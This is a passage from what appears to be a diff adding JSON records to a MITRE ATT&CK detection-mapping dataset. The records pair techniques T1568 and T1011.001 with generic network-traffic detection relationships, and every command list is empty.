This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1568", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "originated from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "responded from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "transport layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "application layer protocol" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic flow", + "description": "Information about the flow of network packets in a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic flow", + "relationship": "identified", + "target_data_element": "network traffic volume" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1011.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
